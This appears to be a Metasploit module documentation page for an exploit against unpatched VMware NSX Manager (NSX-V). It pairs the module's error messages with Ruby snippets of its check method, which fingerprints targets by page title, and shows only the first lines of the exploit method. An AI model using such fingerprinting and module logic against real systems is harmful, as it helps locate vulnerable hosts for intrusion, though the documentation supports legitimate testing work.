129:	  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable

No response received from the target!


Here is a relevant code snippet related to the "No response received from the target!" error message:

128:	  # that indicates the target is running VMware NSX Manager (NSX-V)
129:	  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable
130:	  def check
131:	    print_status("Checking if #{peer} can be exploited.")
132:	    res = check_nsx_v_mgr
133:	    return CheckCode::Unknown('No response received from the target!') unless res
134:	
135:	    html = res.get_html_document
136:	    html_title = html.at('title')
137:	    if html_title.nil? || html_title.text != 'VMware Appliance Management'
138:	      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')

Target is not running VMware NSX Manager (NSX-V).


Here is a relevant code snippet related to the "Target is not running VMware NSX Manager (NSX-V)." error message:

133:	    return CheckCode::Unknown('No response received from the target!') unless res
134:	
135:	    html = res.get_html_document
136:	    html_title = html.at('title')
137:	    if html_title.nil? || html_title.text != 'VMware Appliance Management'
138:	      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
139:	    end
140:	
141:	    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
142:	  end
143:	

Target is running VMware NSX Manager (NSX-V).


Here is a relevant code snippet related to the "Target is running VMware NSX Manager (NSX-V)." error message:

136:	    html_title = html.at('title')
137:	    if html_title.nil? || html_title.text != 'VMware Appliance Management'
138:	      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
139:	    end
140:	
141:	    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
142:	  end
143:	
144:	  def exploit
145:	    case target['Type']
146:	    when :in_memory

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die-gr3y
  • Sina Kheirkhah
  • Steven Seeley

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.